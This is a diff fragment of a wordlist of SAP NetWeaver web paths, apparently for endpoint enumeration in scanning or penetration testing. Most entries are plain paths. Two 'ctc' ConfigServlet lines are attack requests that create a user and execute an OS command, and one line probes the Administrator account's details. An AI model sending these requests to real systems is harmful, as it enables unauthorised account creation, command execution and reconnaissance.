/sap/public/bsp/sap/system
/sap/public/bsp/sap/system_public
/sap/public/BusinessSuite
/sap/public/BusinessSuite/BCV
/sap/public/BusinessSuite/BSSP
/sap/public/BusinessSuite/CBESH_ICONS
/sap/public/BusinessSuite/CloCo
/sap/public/BusinessSuite/TM
/sap/public/BusinessSuite/TM/FlashIslands
/sap/public/BusinessSuite/TM/Icons
/sap/public/BusinessSuite/TM/Icons_rtl
/sap/public/E2EALERT
/sap/public/ES
/sap/public/HRPDV
/sap/public/HRPDV/Icons
/sap/public/HRRenewal
/sap/public/HRRenewal/PB
/sap/public/icf_check
/sap/public/icf_info
/sap/public/icf_info/icr_groups
@@ -457,23 +479,14 @@
/sap/public/icf_info/urlprefix
/sap/public/icman
/sap/public/icman/ping
/sap/public/icmandir/its/kernel_version.info
/sap/public/icmandir/last_update_ITS.txt
/sap/public/icmandir/last_update_icmadmin.txt
/sap/public/info
/sap/public/LSOFE
/sap/public/LSOFE/IconLarge
/sap/public/LSOFE/IconLarge/CORBU
/sap/public/LSOFE/IconLarge/TRADESHOW
/sap/public/LSOFE/Pictogram
/sap/public/LSOFE/Pictogram/CORBU
/sap/public/LSOFE/Pictogram/TRADESHOW
/sap/public/myssocntl
/sap/public/opu
/sap/public/opu/resources
/sap/public/ping
/sap/public/PPM
/sap/public/PPM/PFM
/sap/public/PPM/PFM/BCV
/sap/public/PPM/PFM/UI
/sap/public/PPM/PRO
/sap/wdisp/admin
/sap/wdvd
/sap/webcuif
@@ -485,26 +498,20 @@
/sap/webdynpro/sap/hrtmc_ta_assessment
/sap/webdynpro/sap/hrtmc_ta_dashboard
/sap/webdynpro/sap/wd_analyze_config_user
/sapmc/sapmc.html
/scripts/wgate
/servlet/com.sap.admin.Critical.Actio
/sim/
/sim/config/testdata.jsp
/sim/config/testerror.jsp
/sim/index.html
/SLDStart/plain
/SLDStart/secure
/socoview
/socoview/flddisplay.asp
/SQLtrace/index.html
/sysconfig
/tc/lm/webadmin/clusteradmin
/tc.lm.webadmin.endtoend.public.app
/tc/lm/webadmin/clusteradmin
/teched/test
/TestJDBC_Web
/TOdbo
/top.html
/TSapq
/TXmla
/uddi/
/uddiclient
/uddiclient/jsps/index.jsp
@@ -512,7 +519,6 @@
/useradmin
/userhome
/utl/UsageTypesInfo
/VC
/vscantest/
/webdynpro/dispatcher
/webdynpro/dispatcher/
@@ -530,14 +536,11 @@
/webdynpro/dispatcher/sap.com/tc~slm~ui_lup/LUP
/webdynpro/dispatcher/sap.com/tc~wd~dispwda/servlet_jsp/webdynpro/welcome/root/Welcome.jsp
/webdynpro/dispatcher/sap.com/tc~wd~tools
/webdynpro/dispatcher/sap.com/tc~wd~tools/explorer
/webdynpro/dispatcher/sap.com/tc~wd~tools/WebDynproConsole
/webdynpro/dispatcher/sap.com/tc~wd~tools/explorer
/webdynpro/dispatcher/virsa/ccappcomp/ComplianceCalibrator
/webdynpro/resources/sap.com/
/webdynpro/welcome/Welcome.jsp
/WSConnector/Config1
/WSConnector/Config1?wsdl
/WSConnector/Config?wsdl
/wsd2wsdl
/wsnavigator
/wsnavigator/jsps/index.jsp
@@ -547,3 +550,1084 @@
/wssproc/cert
/wssproc/plain
/wssproc/ssl
@download@
ADS-EJB
ADS-License
AE/index.jsp
Adobe
AdobeDocumentServices/Config
AdobeDocumentServices/Config?wsdl
AdobeDocumentServices/Grmg
AdobeDocumentServicesSec/Config
ApplicationAdminProvider
BI_UDC
BizcCommLayerAuthoring/Config1
BizcCommLayerAuthoring/Config1?wsdl
BizcCommLayerUtilities/Config1
CAFDataService/Config
CAFDataService/Config?wsdl
CMSRTS/Config1
CMSRTS/Config1?wsdl
DataArchivingService
GRMGHeartBeat
GRMGWSTest/service
GRMGWSTest/service?wsdl
IGSCustomizingXML
IciActionItemService/IciActionItemConf
IciActionItemService/IciActionItemConf?wsdl
IciChatLineService/IciChatLineConf
IciChatLineService/IciChatLineConf?wsdl
IciChatSessionService/IciChatSessionConf
IciContainerService/IciContainerConf
IciEventService/
IciEventService/IciEventConf
IciEventService/IciEventConf?wsdl
IciEventService/sap
IciFolderService/IciFolderConf
IciFolderService/IciFolderConf?wsdl
IciItemService/IciItemConf
IciItemService/IciItemConf?wsdl
IciMessageService/IciMessageConf
IciMessageService/IciMessageConf?wsdl
IciMonitorService/IciMonitorConf
IciMonitorService/IciMonitorConf?wsdl
IciPhoneCallService/IciPhoneCallConf
IciPhoneCallService/IciPhoneCallConf?wsdl
IciPhoneLineService/IciPhoneLineConf
IciSystemService/IciSystemConf
IciSystemService/IciSystemConf?wsdl
IciUserService/IciUserConf
IciUserService/IciUserConf?wsdl
KW
Lighthammer
Modeler
OpenSQLMonitors
OpenSQLMonitors/
OpenSQLMonitors/index.html
PerformacetraceTraceApplication
RE/index.jsp
SAPIKS
SAPIKS2
SAPIKS2/contentShow.sap
SAPIKS2/jsp/adminShow.jsp
SAPIrExtHelp
SLDStart/plain
SLDStart/secure
SQLTrace
SQLtrace/index.html
TOdbo
TSapq
TXmla
TestJDBC_Web
VC
WSConnector/Config1
WSConnector/Config1?wsdl
WSConnector/Config2
_default
apidocs/
apidocs/allclasses-frame.html
apidocs/com/sap/engine/connector/connection/IConnection.html
apidocs/com/sap/engine/deploy/manager/Deploymanager.html
apidocs/com/sap/engine/deploy/manager/DeploymanagerFactory.html
apidocs/com/sap/engine/deploy/manager/LoginInfo.html
bcb
bcb/
bcb/bcbadmHome.jsp
bcb/bcbadmNavigation.jsp
bcb/bcbadmSettings.jsp
bcb/bcbadmStart.jsp
bcb/bcbadmSystemInfo.jsp
bcbtest
bcbtest/start.jsp
bwtest
caf
ccsui
com~tc~lm~webadmin~httpprovider~web
ctc
ctc/ConfigServlet?param=com.sap.ctc.util.UserConfig;CREATEUSER;USERNAME=blabla,PASSWORD=blabla
ctc/servlet/com.sap.ctc.util.ConfigServlet?param=com.sap.ctc.util.FileSystemConfig;EXECUTE_CMD;CMDLINE=ipconfig%20/all
dispatcher
dswsbobje
dtr_lite
ecatt
entrypoints/recent
examples
examples.html
examples/
examples_frame.html
exchangeProfile
exchangeProfile/
guid/e067540a-a84c-2d10-77bf-c941bb5a9c7a
htmlb
htmlb/
htmlb/index.html
index.html
inspection.wsil
ipcpricing/ui/
irj
irj/go/km/basicsearch
irj/go/km/details
irj/go/km/docs
irj/go/km/docs/etc/public/mimes/images
irj/go/km/docs/etc/xmlforms
irj/go/km/docs/ume/users
irj/go/km/highlightedcontent
irj/go/km/navigation
irj/go/km/navigation/
irj/go/km/navigation/ume/users
irj/portal
irj/portalapps
irj/portalapps/com.petsmart.portal.navigation.masthead.idle_logout
irj/portalapps/com.sap.portal.design.portaldesigndata
irj/portalapps/com.sap.portal.design.urdesigndata
irj/portalapps/com.sap.portal.epcf.loader
irj/portalapps/com.sap.portal.navigation.detailedtree
irj/sdn/soa-discovery
irj/servlet
irj/servlet/prt
irj/servlet/prt/portal
irj/servlet/prt/portal/
irj/servlet/prt/portal/prtroot
irj/servlet/prt/portal/prtroot/PortalAnywhere.Go
irj/servlet/prt/portal/prtroot/com.sap.km.cm.basicsearch
irj/servlet/prt/portal/prtroot/com.sap.km.cm.docs -> webdav
irj/servlet/prt/portal/prtroot/com.sap.km.cm.highlightedcontent
irj/servlet/prt/portal/prtroot/com.sap.km.cm.navigation
irj/servlet/prt/portal/prtroot/com.sap.km.cm.uidetails
irj/servlet/prt/portal/prtroot/com.sap.km.home_ws
irj/servlet/prt/portal/prtroot/com.sap.netweaver.kmc.people.PeopleDetails?Uri=/ume/users/USER.PRIVATE_DATASOURCE.un%253AAdministrator.usr
irj/servlet/prt/portal/prtroot/com.sap.portal.dsm.terminator
irj/servlet/prt/portal/prtroot/com.sap.portal.epcf.loader.wdscriptblockprovider
irj/servlet/prt/portal/prtroot/pcd!(*)
irj/servlet/prt/portal/prttarget/uidpwlogon/prteventname/performchangepassword
lcrabapapi
logon
logon/index.jsp
logon/logonServlet
logon/logonServlet?redirectURL=%2FVC%2Fdefault.jsp
logon/logonServlet?redirectURL=%2Fuseradmin%2FuserAdminServlet
main.html
mbeanreg
meSync
meSync/HttpGRMGTest.html
mmr
mmr/
modeller/
modeller/index.html
monitoring
monitoringProvierRoot
nwa
performanceProvierRoot
pmi
portal
portalapps
rep/build_info.html
rep/build_info.jsp
rep/start/index.jsp
run/build_info.html
run/build_info.jsp
rwb/version.html
saml
samlssodemo_dest
samlssodemo_source
sap
sap/
sap/IStest
sap/admin
sap/admin/default.html
sap/admin/index.html
sap/ap
sap/bc
sap/bc/
sap/bc/BEx
sap/bc/FormToRfc
sap/bc/FormToRfc/soap
sap/bc/IDoc_XML
sap/bc/MIDSD
sap/bc/MJC
sap/bc/MJC/
sap/bc/MJC/mi_host
sap/bc/MJC/mi_mds
sap/bc/MJC/mi_service
sap/bc/MJC/mi_services
sap/bc/MY_NEW_SERV99
sap/bc/Mi_host_http
sap/bc/Mime
sap/bc/bsp
sap/bc/bsp/
sap/bc/bsp/esh_os_service/favicon.gif
sap/bc/bsp/sap
sap/bc/bsp/sap/
sap/bc/bsp/sap/SXSLT_DEMO
sap/bc/bsp/sap/absenceform_new
sap/bc/bsp/sap/alertinbox
sap/bc/bsp/sap/alertinboxwap
sap/bc/bsp/sap/bexlogon
sap/bc/bsp/sap/bkbtest
sap/bc/bsp/sap/bkbtest_sch
sap/bc/bsp/sap/brf_export_xml
sap/bc/bsp/sap/brf_info
sap/bc/bsp/sap/bsp_dlc_frcmp
sap/bc/bsp/sap/bsp_model
sap/bc/bsp/sap/bsp_veri
sap/bc/bsp/sap/bsp_verificatio
sap/bc/bsp/sap/bsp_vhelp
sap/bc/bsp/sap/bsp_wd_base
sap/bc/bsp/sap/bsp_wd_comp_spl
sap/bc/bsp/sap/bsp_wd_compbase
sap/bc/bsp/sap/bsp_wd_ddlb_spl
sap/bc/bsp/sap/bsp_wd_tree_spl
sap/bc/bsp/sap/bspwd_basics
sap/bc/bsp/sap/bspwd_cmp_embed
sap/bc/bsp/sap/bspwd_simple
sap/bc/bsp/sap/btf_ext_demo
sap/bc/bsp/sap/ccms_mc
sap/bc/bsp/sap/certmap
sap/bc/bsp/sap/certreq
sap/bc/bsp/sap/crm_bm
sap/bc/bsp/sap/crm_bsp_bab_dis
sap/bc/bsp/sap/crm_bsp_bab_dss
sap/bc/bsp/sap/crm_bsp_bab_exi
sap/bc/bsp/sap/crm_bsp_bab_fra
sap/bc/bsp/sap/crm_bsp_bab_pan
sap/bc/bsp/sap/crm_bsp_f1_help
sap/bc/bsp/sap/crm_bsp_f4_help
sap/bc/bsp/sap/crm_bsp_face
sap/bc/bsp/sap/crm_bsp_frame
sap/bc/bsp/sap/crm_bsp_listper
sap/bc/bsp/sap/crm_bsp_lst_prt
sap/bc/bsp/sap/crm_bsp_xbab_fr
sap/bc/bsp/sap/crm_bsp_xbab_pa
sap/bc/bsp/sap/crm_ei_cmp_admn
sap/bc/bsp/sap/crm_ic_check
sap/bc/bsp/sap/crm_ic_ise
sap/bc/bsp/sap/crm_ic_ise/editor
sap/bc/bsp/sap/crm_ic_mcm
sap/bc/bsp/sap/crm_ic_preview
sap/bc/bsp/sap/crm_ic_xmledit
sap/bc/bsp/sap/crm_ici_tst_cat
sap/bc/bsp/sap/crm_ml_preview
sap/bc/bsp/sap/crm_preview
sap/bc/bsp/sap/crm_prt_url_dis
sap/bc/bsp/sap/crm_thtmlb_util
sap/bc/bsp/sap/crm_ui_frame
sap/bc/bsp/sap/crm_ui_start
sap/bc/bsp/sap/crm_xml_test
sap/bc/bsp/sap/crmcmp_bpident/
sap/bc/bsp/sap/crmcmp_brfcase
sap/bc/bsp/sap/crmcmp_hdr
sap/bc/bsp/sap/crmcmp_hdr_std
sap/bc/bsp/sap/crmcmp_ic_frame
sap/bc/bsp/sap/decode_url
sap/bc/bsp/sap/ecteched
sap/bc/bsp/sap/esh_sap_link
sap/bc/bsp/sap/esh_sapgui_exe
sap/bc/bsp/sap/frontend_print
sap/bc/bsp/sap/graph_bsp_test
sap/bc/bsp/sap/graph_bsp_test/Mimes
sap/bc/bsp/sap/graph_tut_chart
sap/bc/bsp/sap/graph_tut_chart/Mimes
sap/bc/bsp/sap/graph_tut_jnet
sap/bc/bsp/sap/graph_tut_jnet/Mimes
sap/bc/bsp/sap/graph_tutorials
sap/bc/bsp/sap/graph_tutorials/mimes
sap/bc/bsp/sap/gsbirp
sap/bc/bsp/sap/hap_document
sap/bc/bsp/sap/hap_q_profile
sap/bc/bsp/sap/hr_expert
sap/bc/bsp/sap/htmlb_samples
sap/bc/bsp/sap/ic_base
sap/bc/bsp/sap/ic_frw_notify
sap/bc/bsp/sap/iccmp_bp_cnfirm
sap/bc/bsp/sap/iccmp_hdr_cntnr
sap/bc/bsp/sap/iccmp_hdr_cntnt
sap/bc/bsp/sap/iccmp_header
sap/bc/bsp/sap/iccmp_ssc_ll/
sap/bc/bsp/sap/icf
sap/bc/bsp/sap/icf_notify_poll
sap/bc/bsp/sap/icfrecorder
sap/bc/bsp/sap/icm
sap/bc/bsp/sap/it00
sap/bc/bsp/sap/it01
sap/bc/bsp/sap/it02
sap/bc/bsp/sap/it03
sap/bc/bsp/sap/it04
sap/bc/bsp/sap/it05
sap/bc/bsp/sap/itsm
sap/bc/bsp/sap/me_fw_install
sap/bc/bsp/sap/merep_app_meta
sap/bc/bsp/sap/ppm
sap/bc/bsp/sap/ppm_detail
sap/bc/bsp/sap/public
sap/bc/bsp/sap/public/
sap/bc/bsp/sap/public/FormGraphics
sap/bc/bsp/sap/public/bc
sap/bc/bsp/sap/public/graphics
sap/bc/bsp/sap/rmpspb_case
sap/bc/bsp/sap/rmpspb_casenote
sap/bc/bsp/sap/rsrthemes_iview
sap/bc/bsp/sap/sam_demo
sap/bc/bsp/sap/sam_notifying
sap/bc/bsp/sap/sam_sess_queue
sap/bc/bsp/sap/sapsign
sap/bc/bsp/sap/sapterm
sap/bc/bsp/sap/sbsp_dal_demo
sap/bc/bsp/sap/sbspext_bsp
sap/bc/bsp/sap/sbspext_htmlb
sap/bc/bsp/sap/sbspext_phtmlb
sap/bc/bsp/sap/sbspext_table
sap/bc/bsp/sap/sbspext_xhtmlb
sap/bc/bsp/sap/scpbspconvertuc
sap/bc/bsp/sap/sem_upwb
sap/bc/bsp/sap/sf_webform_01
sap/bc/bsp/sap/sf_webform_02
sap/bc/bsp/sap/sf_webform_03
sap/bc/bsp/sap/sf_webform_04
sap/bc/bsp/sap/sfint_demo01
sap/bc/bsp/sap/sfint_demo02
sap/bc/bsp/sap/sfint_demo03
sap/bc/bsp/sap/sfint_demo04
sap/bc/bsp/sap/sicf_login_test
sap/bc/bsp/sap/sicf_login_test/
sap/bc/bsp/sap/sicf_login_test/test
sap/bc/bsp/sap/sicf_login_test/testNoRedirect
sap/bc/bsp/sap/smart_forms
sap/bc/bsp/sap/spi_admin
sap/bc/bsp/sap/spi_monitor
sap/bc/bsp/sap/spi_procmonitor
sap/bc/bsp/sap/srm_demo_bspext
sap/bc/bsp/sap/srm_demo_note
sap/bc/bsp/sap/srm_demo_record
sap/bc/bsp/sap/srm_doc_test
sap/bc/bsp/sap/srm_gensp_query
sap/bc/bsp/sap/srm_note
sap/bc/bsp/sap/srm_prop
sap/bc/bsp/sap/srm_record
sap/bc/bsp/sap/srmclfrm
sap/bc/bsp/sap/srmps_browser
sap/bc/bsp/sap/srmps_favorites
sap/bc/bsp/sap/srmps_history
sap/bc/bsp/sap/srmps_metadata
sap/bc/bsp/sap/srmps_search
sap/bc/bsp/sap/srt_browser
sap/bc/bsp/sap/ssf_techinf
sap/bc/bsp/sap/ssfdemodigsig
sap/bc/bsp/sap/ssfdemodigsig2
sap/bc/bsp/sap/swfmod_portal
sap/bc/bsp/sap/swh_demo_calc
sap/bc/bsp/sap/swn_config
sap/bc/bsp/sap/swn_message1
sap/bc/bsp/sap/swn_wiexecute
sap/bc/bsp/sap/swxtraagent
sap/bc/bsp/sap/swxtrareq
sap/bc/bsp/sap/sxidemo_agcy_ui
sap/bc/bsp/sap/sxms_alertrules
sap/bc/bsp/sap/sxslt_training
sap/bc/bsp/sap/system
sap/bc/bsp/sap/system640
sap/bc/bsp/sap/system_priv_01
sap/bc/bsp/sap/system_priv_02
sap/bc/bsp/sap/system_priv_03
sap/bc/bsp/sap/system_private
sap/bc/bsp/sap/system_public
sap/bc/bsp/sap/system_test
sap/bc/bsp/sap/t_sam_demo
sap/bc/bsp/sap/thtmlb_scripts
sap/bc/bsp/sap/thtmlb_styles
sap/bc/bsp/sap/tunguska
sap/bc/bsp/sap/tunguska_detail
sap/bc/bsp/sap/tutorial_1
sap/bc/bsp/sap/tutorial_2
sap/bc/bsp/sap/tutorial_2htmlb
sap/bc/bsp/sap/tutorial_3
sap/bc/bsp/sap/tutorial_3_mvc
sap/bc/bsp/sap/tutorial_4
sap/bc/bsp/sap/tutorial_4_mvc
sap/bc/bsp/sap/tutorial_cache
sap/bc/bsp/sap/uddiclientfind
sap/bc/bsp/sap/uddiclpublish
sap/bc/bsp/sap/uicmp_ltx
sap/bc/bsp/sap/upwb_sem
sap/bc/bsp/sap/upwb_test_otr
sap/bc/bsp/sap/upx_exec
sap/bc/bsp/sap/upx_exec2
sap/bc/bsp/sap/uws_form_servic
sap/bc/bsp/sap/wap_push
sap/bc/bsp/sap/webdynprodemos
sap/bc/bsp/sap/wp_sess_test2
sap/bc/bsp/sap/wscb
sap/bc/bsp/sap/wsi_oci_bsp
sap/bc/bsp/sap/wsi_oci_bsp_mvc
sap/bc/bsp/sap/xi_pf_perf_moni
sap/bc/bsp/sap/xi_pf_test
sap/bc/bsp/sap/xmb_bsp_log
sap/bc/bsp/scmb
sap/bc/bsp/scmb/df_web2
sap/bc/bsp_dev
sap/bc/bw_test
sap/bc/cachetest
sap/bc/ccms
sap/bc/ccms/
sap/bc/ccms//Specto
sap/bc/ccms/MarketSet
sap/bc/ccms/monitoring
sap/bc/ccms/monitoring/GRMG_APP
sap/bc/ccms/monitoringCCMS_XML
sap/bc/ce_url
sap/bc/cimom
sap/bc/cms
sap/bc/contentserver
sap/bc/crm_bsp_dl
sap/bc/dal
sap/bc/dal/demoB
sap/bc/daldemoA
sap/bc/doc
sap/bc/doc/
sap/bc/doc/browser
sap/bc/doc/mast
sap/bc/doc/meta
sap/bc/doc/metadata
sap/bc/doc/tmpl
sap/bc/doc/tran
sap/bc/docu
sap/bc/dr
sap/bc/ecatt
sap/bc/ecatt/
sap/bc/ecatt/ecatt_recorder
sap/bc/ecatt/ecattping
sap/bc/ecatt/log_provider
sap/bc/echo
sap/bc/echo/
sap/bc/echo/logon
sap/bc/echo/logon_base64
sap/bc/echo/redirect
sap/bc/error
sap/bc/error/
sap/bc/error/list
sap/bc/error/template
sap/bc/error/webgui
sap/bc/esf
sap/bc/formabsdelete
sap/bc/fp
sap/bc/fpads
sap/bc/generate
sap/bc/generate/poll
sap/bc/graphics
sap/bc/graphics/net
sap/bc/gui
sap/bc/gui/its
sap/bc/gui/sap
sap/bc/gui/sap/its/
sap/bc/gui/sap/its/BWSP
sap/bc/gui/sap/its/BWWF_WI_DECI
sap/bc/gui/sap/its/BWWI_EXECUTE
sap/bc/gui/sap/its/CCMS_APPSRVLIS
sap/bc/gui/sap/its/CCMS_DBBUFARCH
sap/bc/gui/sap/its/CERTMAP
sap/bc/gui/sap/its/CERTREQ
sap/bc/gui/sap/its/CRM_CIC_RABOX
sap/bc/gui/sap/its/GRM_WRAPPER
sap/bc/gui/sap/its/MININOTES
sap/bc/gui/sap/its/MY_PROFILEMATC
sap/bc/gui/sap/its/RSAU_STATUS
sap/bc/gui/sap/its/SAPSIGN
sap/bc/gui/sap/its/SAP_GENERATE
sap/bc/gui/sap/its/SSFIDEMODIGSIG
sap/bc/gui/sap/its/STATUSPANEL
sap/bc/gui/sap/its/STERM_ITS
sap/bc/gui/sap/its/TEST_XMLPARSER
sap/bc/gui/sap/its/WSI_OCI_ITS
sap/bc/gui/sap/its/XML_DTD_01
sap/bc/gui/sap/its/alinkviewer
sap/bc/gui/sap/its/bwca
sap/bc/gui/sap/its/designs
sap/bc/gui/sap/its/my_qualis
sap/bc/gui/sap/its/my_requirement
sap/bc/gui/sap/its/sample
sap/bc/gui/sap/its/sample/
sap/bc/gui/sap/its/sample/IAC_CALENDAR
sap/bc/gui/sap/its/sample/IAC_FLIGHT
sap/bc/gui/sap/its/sample/IAC_INPUT
sap/bc/gui/sap/its/sample/IAC_SE38
sap/bc/gui/sap/its/sample/IAC_TABLE
sap/bc/gui/sap/its/sample/IAC_TEXTEDIT
sap/bc/gui/sap/its/sample/IAC_TOOLBAR
sap/bc/gui/sap/its/sample/IAC_TREE1
sap/bc/gui/sap/its/sample/IAC_TREE2
sap/bc/gui/sap/its/sample/iAC_HTML
sap/bc/gui/sap/its/test
sap/bc/gui/sap/its/test/
sap/bc/gui/sap/its/test/it
sap/bc/gui/sap/its/test/it/
sap/bc/gui/sap/its/test/it/IT12
sap/bc/gui/sap/its/test/it/IT13
sap/bc/gui/sap/its/test/it/ITRBX
sap/bc/gui/sap/its/test/it/it00
sap/bc/gui/sap/its/test/it/it19
sap/bc/gui/sap/its/test/webgui_end
sap/bc/gui/sap/its/test/webgui_tj
sap/bc/gui/sap/its/test/webgui_txend
sap/bc/gui/sap/its/webgui
sap/bc/gui/sap/its/webgui/!
sap/bc/icf
sap/bc/icf/
sap/bc/icf/demo
sap/bc/icf/demo/example_1
sap/bc/icf/recorder
sap/bc/icf/verification
sap/bc/icman
sap/bc/icman/test01
sap/bc/idoc_xml
sap/bc/igs_data
sap/bc/kw
sap/bc/kw/
sap/bc/kw/K/Link
sap/bc/kw/fs
sap/bc/kw/mime
sap/bc/kw/skwr
sap/bc/mlt
sap/bc/mlt/
sap/bc/mlt//vb
sap/bc/mlt/slim
sap/bc/mlt/slim/
sap/bc/mlt/slim//lang_plus
sap/bc/mlt/slim/branching
sap/bc/mlt/slim/pcx
sap/bc/mlt/slim/pcx_plus
sap/bc/mlt/test
sap/bc/mlt/tmware
sap/bc/mlt/trados
sap/bc/notify
sap/bc/notify/polling
sap/bc/ping
sap/bc/print
sap/bc/rehm
sap/bc/report
sap/bc/sapits_mimes
sap/bc/smart_forms
sap/bc/soap
sap/bc/soap/
sap/bc/soap/doc
sap/bc/soap/ici
sap/bc/soap/ici_ssl
sap/bc/soap/rfc
sap/bc/soap/wsdl
sap/bc/soap/wsdl11
sap/bc/soap/wsdlservices
sap/bc/spi_gate
sap/bc/srm
sap/bc/srm/rcm_webdav
sap/bc/srm/rcm_webdav/
sap/bc/srm/rcm_webdav/s_area_cmg
sap/bc/srm/rcm_webdav/s_area_rms
sap/bc/srt
sap/bc/srt/
sap/bc/srt/IDoc
sap/bc/srt/esf
sap/bc/srt/rfc
sap/bc/srt/rfc/
sap/bc/srt/rfc/OSP
sap/bc/srt/rfc/sap
sap/bc/srt/sap/
sap/bc/srt/sap/Detailed_flight_info_get
sap/bc/srt/sap/ER_REGISTRY_SUPPORT_SERVICE
sap/bc/srt/sap/II_TEST_IN_SYNC
sap/bc/srt/sap/ME_RT_DSD_WS_64
sap/bc/srt/sap/QUERY_VIEW_DATA
sap/bc/srt/sap/RSDAW_NEARLINE_SERVER
sap/bc/srt/sap/RSOBJSALTERNODEREFS
sap/bc/srt/sap/RSOBJS_ALTER_NODE_REFS
sap/bc/srt/sap/RSOBJS_CHECK
sap/bc/srt/sap/RSOBJS_DELETE
sap/bc/srt/sap/RSOBJS_GET_NODES
sap/bc/srt/sap/RSOBJS_INIT
sap/bc/srt/sap/RSOBJS_WHERE_USED_LIST
sap/bc/srt/sap/RSPO_SXOMS_DEFINE_PRINTER
sap/bc/srt/sap/RSPO_SXOMS_DELETE_PRINTER
sap/bc/srt/sap/RSPO_SXOMS_GET_DEVICE_TYPES
sap/bc/srt/sap/RSPO_SXOMS_GET_TRAY_INFO
sap/bc/srt/sap/RSPO_SXOMS_PUSH_ROMS_LOMS
sap/bc/srt/sap/RSPO_SXOMS_UPDATE_PRINTER
sap/bc/srt/sap/SAP_RPE_SEQUENCE
sap/bc/srt/sap/SBIZC_AUTHOR
sap/bc/srt/sap/SBIZC_AUTHORING
sap/bc/srt/sap/SBIZC_DETAIL
sap/bc/srt/sap/SBIZC_TEST_AUTHOR_INIT
sap/bc/srt/sap/SBIZC_WS_TEST
sap/bc/srt/sap/SRTFT_MASS_CONFIGURATION
sap/bc/srt/sap/SRTFT_SYSTEM_METADATA_ACCESS
sap/bc/srt/sap/SRT_TESTS_FB_ADD_WS
sap/bc/srt/sap/SRT_TESTS_FB_PAR_TEST01_WS
sap/bc/srt/sap/SRT_TESTS_FB_PAR_TEST02_WS
sap/bc/srt/sap/SRT_TESTS_FB_PAR_TEST03_WS
sap/bc/srt/sap/SRT_TESTS_FB_SUM_WS
sap/bc/srt/sap/SXIDAL_FLIGHTSEATAVAIL_CHECK
sap/bc/srt/sap/SYNCCALLSECURITYHIGHNOAUTOGEN
sap/bc/srt/sap/SYNCCALLSECURITYLOWAUTOGEN
sap/bc/srt/sap/TEST_WEBSERVICE_WRITE
sap/bc/srt/sap/WDYBUILDINBOX
sap/bc/srt/sap/WDYGETDC
sap/bc/srt/sap/WDYGETTF
sap/bc/srt/sap/WDYSETDC
sap/bc/srt/sap/WDYUPDATETF
sap/bc/srt/sap/WS_ORDER_BE_IN
sap/bc/srt/sap/ob_wsd_test02
sap/bc/srt/sap/xmla
sap/bc/srt/wsil
sap/bc/srt/xip
sap/bc/srt/xip/sap
sap/bc/testzone
sap/bc/testzone/
sap/bc/testzone/depot_select
sap/bc/testzone/result_rep
sap/bc/verification/
sap/bc/verification/itsplugin
sap/bc/verification/stateful_ping
sap/bc/wappush
sap/bc/wd_trace_tool
sap/bc/wdvd
sap/bc/webapp
sap/bc/webdynpro
sap/bc/webdynpro/sap
sap/bc/webdynpro/sap/
sap/bc/webdynpro/sap/CCMSBI_WAST_EXTR_TESTENV
sap/bc/webdynpro/sap/CNP_LIGHT_TEST
sap/bc/webdynpro/sap/DBA_COCKPIT
sap/bc/webdynpro/sap/DEMO_CONTEXT_CHANGES
sap/bc/webdynpro/sap/DEMO_ROADMAP
sap/bc/webdynpro/sap/DEMO_SIMPLE_MAIN
sap/bc/webdynpro/sap/DEMO_TABLE
sap/bc/webdynpro/sap/DEMO_TABLE_WITH_TREE_BY_KEY
sap/bc/webdynpro/sap/DEMO_TABLE_WITH_TREE_BY_NST
sap/bc/webdynpro/sap/DemoDynamic
sap/bc/webdynpro/sap/DemoTree
sap/bc/webdynpro/sap/EXAMPLE_WDABAP_3
sap/bc/webdynpro/sap/KEY_FIGURE_MONITOR
sap/bc/webdynpro/sap/KEY_FIGURE_TREND
sap/bc/webdynpro/sap/MASTERMIND
sap/bc/webdynpro/sap/OTHELLO
sap/bc/webdynpro/sap/POWL
sap/bc/webdynpro/sap/POWL_COLLECTOR
sap/bc/webdynpro/sap/POWL_MASTER_QUERY
sap/bc/webdynpro/sap/POWL_PERS_COMP
sap/bc/webdynpro/sap/RCM_DOC_CLIENT_test
sap/bc/webdynpro/sap/RCM_ORGANIZER
sap/bc/webdynpro/sap/RCM_RECORD
sap/bc/webdynpro/sap/RCM_SP
sap/bc/webdynpro/sap/RCM_SP_URL
sap/bc/webdynpro/sap/SALV_WD_DEMO_TABLE_ALVFNC
sap/bc/webdynpro/sap/SALV_WD_DEMO_TABLE_COLORS
sap/bc/webdynpro/sap/SALV_WD_DEMO_TABLE_COLSCR
sap/bc/webdynpro/sap/SALV_WD_DEMO_TABLE_CV
sap/bc/webdynpro/sap/SALV_WD_DEMO_TABLE_EDIT
sap/bc/webdynpro/sap/SALV_WD_DEMO_TABLE_EVENTS
sap/bc/webdynpro/sap/SALV_WD_DEMO_TABLE_F4
sap/bc/webdynpro/sap/SALV_WD_DEMO_TABLE_MIG
sap/bc/webdynpro/sap/SALV_WD_DEMO_TABLE_PARTS
sap/bc/webdynpro/sap/SALV_WD_DEMO_TABLE_PROPS
sap/bc/webdynpro/sap/SALV_WD_DEMO_TABLE_SIMPLE
sap/bc/webdynpro/sap/SALV_WD_DEMO_TABLE_TOL
sap/bc/webdynpro/sap/SALV_WD_DEMO_TABLE_TOOLBR
sap/bc/webdynpro/sap/SALV_WD_DEMO_TABLE_TREE
sap/bc/webdynpro/sap/SALV_WD_TEST_DATA
sap/bc/webdynpro/sap/SALV_WD_TEST_DATA_DOWNLOAD
sap/bc/webdynpro/sap/SALV_WD_TEST_TABLE_ALVFNC
sap/bc/webdynpro/sap/SALV_WD_TEST_TABLE_COLORS
sap/bc/webdynpro/sap/SALV_WD_TEST_TABLE_COLSCR
sap/bc/webdynpro/sap/SALV_WD_TEST_TABLE_CV
sap/bc/webdynpro/sap/SALV_WD_TEST_TABLE_EDIT
sap/bc/webdynpro/sap/SALV_WD_TEST_TABLE_EDIT_M
sap/bc/webdynpro/sap/SALV_WD_TEST_TABLE_EVENTS
sap/bc/webdynpro/sap/SALV_WD_TEST_TABLE_IN_WDW
sap/bc/webdynpro/sap/SALV_WD_TEST_TABLE_PROPS
sap/bc/webdynpro/sap/SALV_WD_TEST_TABLE_SELECT
sap/bc/webdynpro/sap/SALV_WD_TEST_TABLE_SIMPLE
sap/bc/webdynpro/sap/SALV_WD_TEST_TABLE_TOOLBR
sap/bc/webdynpro/sap/SALV_WD_TEST_TABLE_TREE
sap/bc/webdynpro/sap/TEST_BAD_LINK
sap/bc/webdynpro/sap/TEST_MODIFY_VIEW
sap/bc/webdynpro/sap/TEST_RUNTIME_REPOSITORY
sap/bc/webdynpro/sap/TestUpload
sap/bc/webdynpro/sap/WDK_A_SE91
sap/bc/webdynpro/sap/WDK_SPOOL_TO_PDF
